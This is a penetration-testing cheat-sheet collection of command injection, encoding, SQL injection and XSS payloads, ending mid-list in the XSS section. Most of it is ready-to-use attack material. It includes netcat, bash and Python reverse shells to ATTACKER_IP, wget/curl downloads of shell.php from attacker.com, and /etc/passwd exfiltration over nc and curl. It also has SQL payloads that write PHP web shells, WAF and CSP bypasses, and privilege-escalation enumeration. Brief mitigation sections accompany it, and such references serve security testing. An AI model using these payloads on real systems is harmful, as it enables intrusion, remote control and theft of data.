Command Injection Payloads

Command Injection Payloads Comprehensive collection of command injection payloads and bypass techniques for penetration testing. Basic Command Injection Simple Commands # Basic command execution (; and && / || chain commands; | feeds the original command's output to the injected one, which usually ignores it, so both still run; if the injection lands inside quotes, close them first, e.g. '; ls or "; ls) ; ls | ls & ls && ls || ls # Command chaining ; ls; whoami | ls | cat & ls & whoami && ls && whoami || ls || whoami Information Gathering # System information ; uname -a ; whoami ; id ; pwd ; ls -la ; cat /etc/passwd ; cat /etc/hosts ; cat /proc/version ; cat /proc/cpuinfo ; cat /proc/meminfo Network Information # Network interfaces ; ifconfig ; ip addr ; ip route ; netstat -an ; ss -tuln ; arp -a ; route -n Process Information # Running processes (top and htop are interactive and block without a terminal; use top -bn1 for a one-shot listing) ; ps aux ; ps -ef ; top ; htop ; pstree ; lsof ; fuser Advanced Command Injection File Operations # File reading (more and less are pagers and may hang without a terminal; prefer cat, head or tail) ; cat /etc/passwd ; head /etc/passwd ; tail /etc/passwd ; more /etc/passwd ; less /etc/passwd ; grep root /etc/passwd ; awk '{print $1}' /etc/passwd ; sed -n '1,10p' /etc/passwd Directory Traversal # Directory listing ; ls -la / ; ls -la /home ; ls -la /var ; ls -la /tmp ; find / -name "*.txt" 2>/dev/null ; find / -name "*.log" 2>/dev/null ; find / -name "*.conf" 2>/dev/null User Enumeration # User information ; cat /etc/passwd ; cut -d: -f1 /etc/passwd ; awk -F: '{print $1}' /etc/passwd ; getent passwd ; id ; whoami ; groups ; last ; w ; who Privilege Escalation # SUID files ; find / -perm -4000 2>/dev/null ; find / -perm -u+s 2>/dev/null ; find / -perm -2000 2>/dev/null ; find / -perm -g+s 2>/dev/null # Sudo capabilities ; sudo -l ; sudo -V ; cat /etc/sudoers ; grep -v '^#' /etc/sudoers Bypass Techniques Character Filtering Bypass # Space bypass (tab works as an argument separator; a newline or carriage return ends the command instead, so %0a is useful as a command separator, not as a space; form feed and vertical tab are not in bash's default IFS and will not split the word; the brace and redirection forms need no whitespace at all) ; cat${IFS}/etc/passwd ; cat$IFS/etc/passwd ; cat<tab>/etc/passwd ; cat<newline>/etc/passwd ; cat<carriage_return>/etc/passwd ; cat<form_feed>/etc/passwd ; cat<vertical_tab>/etc/passwd ; {cat,/etc/passwd} ; cat</etc/passwd # Quote bypass (quotes and backslashes that the shell strips break up a filtered keyword; backticks are command substitution, so `/etc/passwd` would try to execute the file rather than read it, and is not a quoting form) ; cat /etc/passwd ; cat "/etc/passwd" ; cat '/etc/passwd' ; c"a"t /etc/passwd ; c'a't /etc/passwd ; \c\a\t /etc/passwd ; cat /e?c/pass?? Command Filtering Bypass # Case variation (only on case-insensitive filesystems such as Windows or default macOS; on Linux Ls is simply not found) ; Ls ; LS ; lS ; Ls -La ; Ls -LA # Encoding bypass (send the pre-encoded string; encoding and decoding inside the same payload, as in echo "cat /etc/passwd" | base64 | base64 -d | sh, still exposes the plaintext command to the filter) ; echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | sh ; echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash ; echo 636174202f6574632f706173737764 | xxd -r -p | /bin/sh
WAF Bypass # Comment bypass (only # is a comment to sh/bash; /*, */ and <!-- are SQL/HTML comment tokens that the shell treats as a glob or a redirection, so they confuse signature-based filters rather than comment anything out) ; cat /etc/passwd # ; cat /etc/passwd /* ; cat /etc/passwd */ ; cat /etc/passwd <!-- # Encoding bypass (the encoded variants were flattened to plaintext in rendering; shown here as the same payload URL-encoded, double-URL-encoded, and with a tab or newline instead of the space) ; %3Bcat%20%2Fetc%2Fpasswd ; %253Bcat%2520%252Fetc%252Fpasswd ; %3Bcat%09%2Fetc%2Fpasswd ; %0Acat%20%2Fetc%2Fpasswd Platform-specific Payloads Windows # Basic commands (cmd.exe does not treat ; as a separator; chain with &, &&, | or ||; ; does work under PowerShell) & dir & type C:\Windows\System32\drivers\etc\hosts & whoami & systeminfo & ipconfig & netstat -an & tasklist & wmic process list & wmic service list & reg query HKLM\SOFTWARE Linux/Unix # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; ss -tuln ; ifconfig ; ip addr ; route -n macOS # Basic commands (local accounts live in Directory Services, so /etc/passwd lists only system users; use dscl . list /Users) ; ls ; cat /etc/passwd ; dscl . list /Users ; whoami ; uname -a ; ps aux ; netstat -an ; lsof -i ; ifconfig ; route -n ; system_profiler Advanced Techniques Reverse Shell # Netcat reverse shell (-e exists in netcat-traditional and ncat; OpenBSD netcat, the default on many distributions, lacks it, so use the mkfifo form there) ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT ; rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f # Bash reverse shell (/dev/tcp is a bash feature; if the injection runs under /bin/sh, wrap it in bash -c) ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' # Python reverse shell (python3 where python is not on PATH) ; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' File Upload # Download file (the nc form listens on the target; push the file from the attacker side with nc TARGET_IP 1234 < shell.php; urllib.urlretrieve is Python 2 only, so the Python 3 form is given) ; wget http://attacker.com/shell.php ; curl -O http://attacker.com/shell.php ; nc -l -p 1234 > shell.php ; python3 -c "import urllib.request; urllib.request.urlretrieve('http://attacker.com/shell.php', 'shell.php')" Data Exfiltration # Send data to attacker (curl -d strips newlines from its input; --data-binary keeps the file intact) ; cat /etc/passwd | nc ATTACKER_IP PORT ; cat /etc/passwd | curl -X POST --data-binary @- http://attacker.com/collect ; cat /etc/passwd | base64 | nc ATTACKER_IP PORT ; tar -czf - /etc/passwd | nc ATTACKER_IP PORT Testing Tools Commix # Basic scan python3 commix.py -u 
"http://target.com/page.php?cmd=test" # With POST data python3 commix.py -u "http://target.com/page.php" --data="cmd=test" # With cookies python3 commix.py -u "http://target.com/page.php?cmd=test" --cookie="PHPSESSID=abc123" # OS shell python3 commix.py -u "http://target.com/page.php?cmd=test" --os-shell Custom Script import requests import re def test_command_injection(url, param, payload): data = {param: payload} response = requests.post(url, data=data) # Check for command injection indicators (a weak heuristic: generic strings such as "total" or "-rw-" also occur in normal pages, so compare against a baseline response and confirm with a time-based payload such as "; sleep 5" or an out-of-band callback) indicators = [ "root:", "bin/bash", "bin/sh", "uid=", "gid=", "groups=", "total", "drwx", "-rw-", "Directory of", "Volume in drive" ] for indicator in indicators: if indicator in response.text: print(f"Command injection detected: {payload}") break # Test payloads payloads = [ "; ls", "| ls", "& ls", "&& ls", "|| ls", "; whoami", "| whoami", "& whoami", "&& whoami", "|| whoami" ] for payload in payloads: test_command_injection("http://target.com/command.php", "cmd", payload) Prevention and Mitigation Input Validation import re import shlex def validate_command(input_str): # Whitelist allowed characters (the allow-list is the real control: anything outside it is rejected here) allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.') if not set(input_str).issubset(allowed_chars): return False # Check for dangerous characters (redundant after the allow-list, since none of these can pass it; kept as defence in depth. Neither check stops a caller naming an arbitrary program or passing a leading "-" option, so also allow-list the permitted command names) dangerous_chars = [';', '|', '&', '&&', '||', '`', '$', '(', ')', '<', '>', '\\', '"', "'"] for char in dangerous_chars: if char in input_str: return False return True Command Execution import subprocess import shlex def safe_command_execution(command): # Validate input if not validate_command(command): raise ValueError("Invalid command") # Use shlex to safely parse command (validate_command rejects spaces, so this yields a single token today; it matters only if the allow-list is widened) args = shlex.split(command) # Execute command safely: an argv list with the default shell=False means no shell ever parses the input; timeout bounds a hung child (subprocess.TimeoutExpired is raised), and the exit status is left in result.returncode for the caller to inspect result = subprocess.run(args, capture_output=True, text=True, timeout=30) return result.stdout, result.stderr Sandboxing import subprocess import shlex import tempfile def sandboxed_execution(command): # WARNING: a temporary working directory is not a sandbox. It only changes where the child starts and does nothing to limit what it can read, write or connect to. Real confinement needs an OS-level boundary: a dedicated unprivileged user, seccomp/AppArmor, namespaces or a container, and resource limits. # Create temporary directory with tempfile.TemporaryDirectory() as temp_dir: # 
Pass argv as a list with shell=False: shell=True on caller-supplied input is itself the command injection this page describes, and the original os.chdir() was both unnecessary (cwd= applies to the child only) and harmful (it moved the whole process into a directory that is deleted on exit) result = subprocess.run( shlex.split(command), shell=False, capture_output=True, text=True, timeout=30, cwd=temp_dir ) return result.stdout, result.stderr Testing Checklist Test all input fields Test with different HTTP methods Test with different content types Test with different command separators Test with different quote types Test with different encoding methods Test with different bypass techniques Test with different WAF bypasses Test with different platform-specific commands Test with different privilege escalation techniques


Encoding/Decoding Tools

Encoding/Decoding Tools Various encoding and decoding utilities commonly used in penetration testing and security assessments. Base64 Encoding/Decoding Encode to Base64 # String to Base64 echo -n "TARGET_STRING" | base64 # File to Base64 (-i/-o are the macOS flags; on GNU coreutils -i means --ignore-garbage, so use base64 input.txt > encoded.txt there) base64 -i input.txt # Base64 without line wrapping (GNU base64 wraps output at 76 columns by default; -w 0 disables that, which is what you want for a payload; macOS base64 does not wrap and lacks -w) echo -n "TARGET_STRING" | base64 -w 0 Decode from Base64 # Base64 to String echo "BASE64_STRING" | base64 -d # Base64 file to output (macOS form; GNU: base64 -d encoded.txt > decoded.txt) base64 -d -i encoded.txt -o decoded.txt # Base64 to stdout echo "BASE64_STRING" | base64 -d URL Encoding/Decoding URL Encode # Using Python (quote() leaves / unencoded by default; pass safe='' to encode every reserved character) python3 -c "import urllib.parse; print(urllib.parse.quote('TARGET_STRING', safe=''))" # Using Node.js node -e "console.log(encodeURIComponent('TARGET_STRING'))" # Using xxd (hex-encodes every byte; xxd -p wraps at 30 bytes, so strip newlines for longer input) echo -n "TARGET_STRING" | xxd -p | tr -d '\n' | sed 's/../%&/g' URL Decode # Using Python python3 -c "import urllib.parse; print(urllib.parse.unquote('ENCODED_STRING'))" # Using Node.js node -e "console.log(decodeURIComponent('ENCODED_STRING'))" Hex Encoding/Decoding String to Hex # Using xxd echo -n "TARGET_STRING" | xxd -p # Using od echo -n "TARGET_STRING" | od -A n -t x1 # Using hexdump (canonical dump with offsets and an ASCII column, not a bare hex string; use hexdump -v -e '1/1 "%02x"' for that) echo -n "TARGET_STRING" | hexdump -C Hex to String # Using xxd echo "HEX_STRING" | xxd -r -p # Using printf printf "\\x48\\x65\\x6c\\x6c\\x6f" ROT13 Encoding ROT13 Encode/Decode # Using tr echo "TARGET_STRING" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Using Python python3 -c "import codecs; print(codecs.encode('TARGET_STRING', 'rot13'))" Caesar Cipher Caesar Cipher (Shift 13) # Using tr with custom shift echo "TARGET_STRING" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Python implementation python3 -c " def caesar_cipher(text, shift): result = '' for char in text: if char.isalpha(): ascii_offset = 65 if char.isupper() else 97 result += chr((ord(char) - ascii_offset + shift) % 26 + ascii_offset) else: result += char return result print(caesar_cipher('TARGET_STRING', 13)) " Binary Encoding String to Binary # Using xxd echo -n "TARGET_STRING" | xxd -b # Using Python python3 -c " text = 
'TARGET_STRING' binary = ' '.join(format(ord(char), '08b') for char in text) print(binary) " Binary to String # Using Python python3 -c " binary = '01001000 01100101 01101100 01101100 01101111' text = ''.join(chr(int(b, 2)) for b in binary.split()) print(text) " HTML Entity Encoding HTML Encode # Using Python python3 -c " import html print(html.escape('TARGET_STRING')) " HTML Decode # Using Python python3 -c " import html print(html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')) " Unicode Encoding String to Unicode # Using Python python3 -c " text = 'TARGET_STRING' unicode_str = ''.join(f'\\u{ord(char):04x}' for char in text) print(unicode_str) " Unicode to String # Using Python (unicode_escape reads the bytes as Latin-1, so this is only safe for pure-ASCII input containing \uXXXX sequences; non-ASCII characters in the literal get mangled) python3 -c " unicode_str = '\\u0048\\u0065\\u006c\\u006c\\u006f' print(unicode_str.encode().decode('unicode_escape')) " Advanced Encoding Techniques Double URL Encoding # First encoding python3 -c "import urllib.parse; print(urllib.parse.quote('TARGET_STRING'))" | python3 -c "import urllib.parse; print(urllib.parse.quote(input()))" Base64 + URL Encoding # Base64 then URL encode (quote() leaves / alone; use quote(input(), safe='') to encode the + / = of base64 output too) echo -n "TARGET_STRING" | base64 | python3 -c "import urllib.parse; print(urllib.parse.quote(input()))" Hex + URL Encoding # Hex then URL encode echo -n "TARGET_STRING" | xxd -p | python3 -c "import urllib.parse; print(urllib.parse.quote(input()))" One-liner Commands Quick Base64 Encode echo -n "TARGET_STRING" | base64 | tr -d '\n' Quick URL Encode python3 -c "import urllib.parse; print(urllib.parse.quote('TARGET_STRING'))" Quick Hex Encode echo -n "TARGET_STRING" | xxd -p | tr -d '\n' Quick ROT13 echo "TARGET_STRING" | tr 'A-Za-z' 'N-ZA-Mn-za-m' File Operations (the -i/-o forms are macOS base64; on GNU coreutils use base64 input.txt > encoded.txt and base64 -d encoded.txt > decoded.txt) Encode File to Base64 base64 -i input.txt -o encoded.txt Decode Base64 File base64 -d -i encoded.txt -o decoded.txt Encode Multiple Files for file in *.txt; do base64 -i "$file" -o "${file%.txt}.b64" done Online Alternatives If command-line tools are not available, online encoders can be used, but never paste client data, credentials, tokens or other engagement artefacts into a third-party service: everything submitted is disclosed to its operator and may be logged. Services: ...


SQL Injection Payloads

SQL Injection Payloads Comprehensive collection of SQL injection payloads and bypass techniques for penetration testing. Two things to keep in mind throughout: a UNION must match the column count (and compatible types) of the original query, so find it first with ORDER BY n or by padding with NULLs; and in MySQL the -- comment needs a trailing space, so send -- - or --+ in a URL, # is MySQL-only, and /* */ is portable. Basic SQL Injection Union-based Injection -- Basic UNION ' UNION SELECT 1,2,3-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT 1,2,3,4,5-- -- With column names ' UNION SELECT username,password,email FROM users-- ' UNION SELECT table_name,column_name FROM information_schema.columns-- -- Multiple columns ' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- Boolean-based Blind Injection -- Basic boolean tests ' OR 1=1-- ' OR '1'='1 ' OR 1=1# ' OR 1=1/* -- Conditional statements ' AND 1=1-- ' AND 1=2-- ' AND (SELECT COUNT(*) FROM users) > 0-- ' AND (SELECT LENGTH(username) FROM users LIMIT 1) > 5-- Time-based Blind Injection -- MySQL ' AND SLEEP(5)-- ' AND (SELECT SLEEP(5))-- ' AND IF(1=1,SLEEP(5),0)-- -- PostgreSQL (pg_sleep returns void, so it cannot sit directly in a boolean expression; use the stacked form, a FROM clause, or string concatenation) '; SELECT pg_sleep(5)-- ' AND (SELECT 1 FROM pg_sleep(5))=1-- '||pg_sleep(5)-- -- MSSQL '; WAITFOR DELAY '00:00:05'-- ' AND (SELECT COUNT(*) FROM sys.tables) > 0; WAITFOR DELAY '00:00:05'-- -- Oracle (DBMS_LOCK.SLEEP is a procedure and cannot be called inside a SQL expression; DBMS_PIPE.RECEIVE_MESSAGE is a function that returns after the timeout, so the delay only occurs when the condition is true) ' AND 1=(SELECT CASE WHEN (SELECT COUNT(*) FROM all_tables) > 0 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 1 END FROM dual)-- Database-specific Payloads MySQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT VERSION()-- -- Database enumeration ' UNION SELECT SCHEMA_NAME FROM information_schema.schemata-- ' UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=DATABASE()-- -- User enumeration ' UNION SELECT USER()-- ' UNION SELECT CURRENT_USER()-- ' UNION SELECT user,host FROM mysql.user-- -- File operations (LOAD_FILE and INTO OUTFILE need the FILE privilege and are disabled or confined by secure_file_priv; the target path must also be writable by the database server's OS user) ' UNION SELECT LOAD_FILE('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'-- PostgreSQL -- Version detection ' UNION SELECT version()-- -- Database enumeration ' UNION SELECT datname FROM pg_database-- ' UNION SELECT tablename FROM pg_tables-- -- User enumeration ' UNION SELECT current_user-- ' UNION SELECT usename FROM pg_user-- -- File operations (pg_read_file and COPY ... TO need superuser or the pg_read_server_files / pg_write_server_files roles; INTO OUTFILE is MySQL syntax and does not exist in PostgreSQL) ' UNION SELECT pg_read_file('/etc/passwd')-- '; COPY (SELECT '<?php system($_GET[cmd]); ?>') TO 
'/var/www/shell.php'-- MSSQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT SERVERPROPERTY('productversion')-- -- Database enumeration ' UNION SELECT name FROM sys.databases-- ' UNION SELECT table_name FROM information_schema.tables-- -- User enumeration ' UNION SELECT SYSTEM_USER-- ' UNION SELECT USER_NAME()-- ' UNION SELECT name FROM sys.server_principals-- -- File operations (OPENROWSET(BULK ...) requires the ADMINISTER BULK OPERATIONS server permission) ' UNION SELECT * FROM OPENROWSET('BULK','C:\\Windows\\System32\\drivers\\etc\\hosts','SINGLE_CLOB') AS x-- Oracle -- Version detection ' UNION SELECT banner FROM v$version-- ' UNION SELECT version FROM v$instance-- -- Database enumeration ' UNION SELECT table_name FROM all_tables-- ' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'-- -- User enumeration ' UNION SELECT user FROM dual-- ' UNION SELECT username FROM all_users-- -- File operations (UTL_FILE is a PL/SQL package of procedures such as FOPEN and GET_LINE rather than a scalar FREAD function, so it cannot be called from a plain UNION SELECT; reading a file needs a PL/SQL block, an existing directory object, and matching privileges — verify against the Oracle documentation for the target version) ' UNION SELECT UTL_FILE.FREAD('DIRECTORY','filename') FROM dual-- Advanced Bypass Techniques WAF Bypass -- Comment variations (the /*! ... */ form is a MySQL-only conditional comment) '/**/UNION/**/SELECT/**/1,2,3-- '/*!UNION*//*!SELECT*/1,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- -- Case variation ' UnIoN SeLeCt 1,2,3-- ' uNiOn sElEcT 1,2,3-- -- Encoding bypass ' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3-- ' %55nion %53elect 1,2,3-- -- Double encoding ' %2555%254e%2549%254f%254e %2553%2545%254c%2545%2543%2554 1,2,3-- Filter Bypass -- Space replacement '/**/UNION/**/SELECT/**/1,2,3-- '%09UNION%09SELECT%091,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- '%0DUNION%0DSELECT%0D1,2,3-- '%0CUNION%0CSELECT%0C1,2,3-- '%0BUNION%0BSELECT%0B1,2,3-- -- Keyword replacement (the database does not join a keyword split by a comment or NUL either, so these only succeed where something between the WAF and the database strips the inserted bytes; treat them as low-probability) ' UNI/**/ON SEL/**/ECT 1,2,3-- ' UNI%00ON SEL%00ECT 1,2,3-- ' UNI%0aON SEL%0aECT 1,2,3-- Quote Bypass -- Without quotes (numeric context, nothing to close; a string context that filters quotes needs a quote-free comparison such as the hex/CHAR forms below) 1 OR 1=1-- 1 OR 1=1# 1 OR 1=1/* -- With different quote types (backticks are MySQL identifier quotes, so `1`=`1 compares two columns named 1 and errors unless such a column exists) ' OR "1"="1-- ' OR '1'='1-- ' OR `1`=`1-- -- Hex encoding ' OR 0x31=0x31-- ' OR CHAR(49)=CHAR(49)-- Error-based Injection MySQL Error-based (the XPath error message reveals at most 32 characters; wrap longer values in SUBSTRING(...,1,32), SUBSTRING(...,33,32) and so on to page through them) -- Extract database name ' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- ' AND 
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -- Extract table names ' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1),0x7e))-- -- Extract column names ' AND extractvalue(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),0x7e))-- MySQL Error-based, duplicate-key / GROUP BY technique (database(), RAND() and FLOOR() are MySQL functions; this block was previously mislabelled as PostgreSQL) -- Extract database name ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -- Extract table names ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- PostgreSQL Error-based (cast the value to an incompatible type so it is echoed back in the error message) -- Extract database name ' AND 1=CAST((SELECT current_database()) AS int)-- -- Extract table names ' AND 1=CAST((SELECT tablename FROM pg_tables LIMIT 1) AS int)-- Second-order SQL Injection User Registration -- Username field admin'-- admin'/* admin'# -- Email field admin@test.com'-- admin@test.com'/* admin@test.com'# Profile Update -- Name field ' OR 1=1-- ' OR '1'='1 ' OR 1=1# -- Bio field ' UNION SELECT username,password FROM users-- ' UNION SELECT 1,2,3-- NoSQL Injection MongoDB // Basic injection (these are operator objects; they only apply where the application passes a parsed JSON body or a PHP-style param[$ne] array straight into the query) {"$ne": null} {"$gt": ""} {"$regex": ".*"} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$gt": ""}, "password": {"$gt": ""}} // Data extraction {"$where": "this.username.match(/.*/)"} {"$where": "this.password.match(/.*/)"} CouchDB // Basic injection {"$ne": null} {"$gt": ""} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} Automated Tools SQLMap Commands # Basic scan sqlmap -u "http://target.com/page.php?id=1" # With POST data sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123" # Database enumeration (--tables, --columns and --dump operate on the current database unless -D <db> is given) sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" --tables sqlmap -u "http://target.com/page.php?id=1" --columns -T users sqlmap -u "http://target.com/page.php?id=1" --dump -T users # OS shell sqlmap -u 
"http://target.com/page.php?id=1" --os-shell Custom Scripts # Python SQL injection tester import requests import time def test_sql_injection(url, param, payload): data = {param: payload} start_time = time.time() response = requests.post(url, data=data) end_time = time.time() # Heuristics only: measure a baseline request first, since a slow server, or the words "error"/"success" in ordinary page content, produce false positives; a real boolean test sends a true/false payload pair and compares the two responses if end_time - start_time > 4: print(f"Time-based injection detected: {payload}") elif "error" in response.text.lower(): print(f"Error-based injection detected: {payload}") elif "success" in response.text.lower(): print(f"Boolean-based injection detected: {payload}") # Test payloads payloads = [ "' OR 1=1--", "' UNION SELECT 1,2,3--", "' AND SLEEP(5)--", "' OR '1'='1" ] for payload in payloads: test_sql_injection("http://target.com/login.php", "username", payload) Prevention and Mitigation Parameterized Queries (placeholders send the values separately from the SQL text, so a quote in the input cannot change the statement; note that these examples also compare a plaintext password inside SQL, which is a separate defect: look the user up by username only and verify the stored salted hash in application code with bcrypt or argon2) # Python example cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password)) # PHP example $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?"); $stmt->execute([$username, $password]); Input Validation (defence in depth only; it never replaces parameterization) # Whitelist validation allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') if not set(username).issubset(allowed_chars): return "Invalid username" # Length validation if len(username) > 50: return "Username too long" Testing Checklist Test all input fields Test with different HTTP methods (GET, POST, PUT, DELETE) Test with different content types (application/x-www-form-urlencoded, application/json) Test with different encodings (URL, Base64, Hex) Test with different quote types (single, double, backtick) Test with different comment styles (--, #, /* */) Test with different space replacements Test with different case variations Test with different encoding bypasses Test with different WAF bypass techniques


XSS Payloads

XSS Payloads Comprehensive collection of Cross-Site Scripting (XSS) payloads and bypass techniques. Basic XSS Payloads Simple Alert (a <script> element only runs when it is part of the initial parse; markup inserted later through innerHTML does not execute it, so use an event-handler payload such as the img/svg forms for DOM sinks) <script>alert('XSS')</script> <script>alert(1)</script> <script>alert(document.domain)</script> <script>alert(document.cookie)</script> Image Tag (the javascript: form is legacy only; modern browsers do not run javascript: URLs in an img src) <img src=x onerror=alert('XSS')> <img src="javascript:alert('XSS')"> <img src=x onerror=alert(1)> <img src=x onerror=alert(document.cookie)> Input Tag <input onfocus=alert('XSS') autofocus> <input onmouseover=alert('XSS')> <input onfocus=alert(1) autofocus> <input onblur=alert(1) autofocus><input autofocus> Event Handlers Mouse Events <div onmouseover=alert('XSS')>Hover me</div> <div onmouseenter=alert('XSS')>Enter me</div> <div onmouseleave=alert('XSS')>Leave me</div> <div onmousedown=alert('XSS')>Click me</div> <div onmouseup=alert('XSS')>Release me</div> <div onclick=alert('XSS')>Click me</div> <div ondblclick=alert('XSS')>Double click me</div> Keyboard Events <input onkeydown=alert('XSS')> <input onkeyup=alert('XSS')> <input onkeypress=alert('XSS')> <input onkeydown=alert(1)> <input onkeyup=alert(1)> <input onkeypress=alert(1)> Form Events <form onsubmit=alert('XSS')> <input onchange=alert('XSS')> <input oninput=alert('XSS')> <input oninvalid=alert('XSS')> <input onreset=alert('XSS')> <input onsearch=alert('XSS')> Window Events <body onload=alert('XSS')> <body onunload=alert('XSS')> <body onbeforeunload=alert('XSS')> <body onresize=alert('XSS')> <body onscroll=alert('XSS')> <body onfocus=alert('XSS')> <body onblur=alert('XSS')> Filter Bypass Techniques Case Variation <SCRIPT>alert('XSS')</SCRIPT> <ScRiPt>alert('XSS')</ScRiPt> <script>alert('XSS')</script> <SCRIPT>alert('XSS')</SCRIPT> Encoding Bypass <!-- URL Encoding --> %3Cscript%3Ealert('XSS')%3C/script%3E %3Cimg%20src=x%20onerror=alert('XSS')%3E <!-- HTML Entities (the browser renders these as literal text; they fire only where the application decodes entities before inserting into the DOM, or where the value lands inside an attribute that is later used as HTML) --> &lt;script&gt;alert('XSS')&lt;/script&gt; &lt;img src=x onerror=alert('XSS')&gt; <!-- Hex Encoding (same caveat: numeric entities are decoded inside attribute values, not in element content) --> &#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E; &#x3C;img src=x 
onerror=alert('XSS')&#x3E; <!-- Unicode (only meaningful inside a JavaScript string context, where the JS engine decodes the escapes) --> \u003cscript\u003ealert('XSS')\u003c/script\u003e Quote Bypass <!-- Without quotes (the original list still contained quotes; alert(XSS) is a ReferenceError, so use a number, a regex source, or String.fromCharCode) --> <img src=x onerror=alert(1)> <img src=x onerror=alert(/XSS/.source)> <img src=x onerror=alert(String.fromCharCode(88,83,83))> <!-- With different quote types --> <img src=x onerror=alert('XSS')> <img src=x onerror=alert("XSS")> <img src=x onerror=alert(`XSS`)> Space Bypass (the whitespace characters were lost in rendering; shown URL-encoded, the tab, newline, carriage return and form feed all separate attributes in HTML, and a slash works too) <!-- Tab --> <img%09src=x%09onerror=alert('XSS')> <!-- Newline --> <img%0Asrc=x%0Aonerror=alert('XSS')> <!-- Carriage return --> <img%0Dsrc=x%0Donerror=alert('XSS')> <!-- Form feed --> <img%0Csrc=x%0Conerror=alert('XSS')> <!-- Slash --> <img/src=x/onerror=alert('XSS')> Comment Bypass <!-- HTML Comments --> <img src=x onerror=alert('XSS')><!-- <img src=x onerror=alert('XSS')>--> <!-- JavaScript Comments (the // form needs a real line break after the comment; rendered on one line it comments out the alert) --> <script>/*comment*/alert('XSS')</script> <script>//comment alert('XSS')</script> Advanced Bypass Techniques WAF Bypass <!-- OWASP ModSecurity --> <svg onload=alert('XSS')> <iframe onload=alert('XSS')> <object onload=alert('XSS')> <embed onload=alert('XSS')> <!-- Cloudflare (the three variants were identical after rendering; generic obfuscations that avoid the literal alert( and quoted-string signatures are shown instead, and vendor rules change often, so treat them as starting points) --> <img src=x onerror=alert`XSS`> <img src=x onerror=&#97;lert('XSS')> <svg/onload=alert('XSS')> CSP Bypass (none of these defeat a correctly configured policy; they work only against misconfigurations) <!-- Nonce bypass: only if the nonce is static, predictable, or leaked into a context you can read, because the injected script must carry the exact per-response value --> <script nonce="random">alert('XSS')</script> <!-- Hash bypass: an inline script runs only if its hash is already in script-src, so this needs the policy to allow-list a script you can reuse, or 'unsafe-inline' --> <script>alert('XSS')</script> <!-- Source bypass: needs data: in script-src; a javascript: URL in src is not fetched as a script by modern browsers --> <script src="data:text/javascript,alert('XSS')"></script> <script src="javascript:alert('XSS')"></script> DOM-based XSS // URL Fragment #<script>alert('XSS')</script> #<img src=x onerror=alert('XSS')> // Hash change window.location.hash = "<script>alert('XSS')</script>"; // Document write document.write('<script>alert("XSS")</script>'); // InnerHTML (scripts inserted via innerHTML never execute; an event-handler payload such as <img src=x onerror=...> is required for this sink) element.innerHTML = '<script>alert("XSS")</script>'; // Eval eval('alert("XSS")'); Stored XSS Payloads Profile Fields <!-- Name field --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <!-- Bio field --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <!-- Comment field --> <script>alert('XSS')</script> <img src=x 
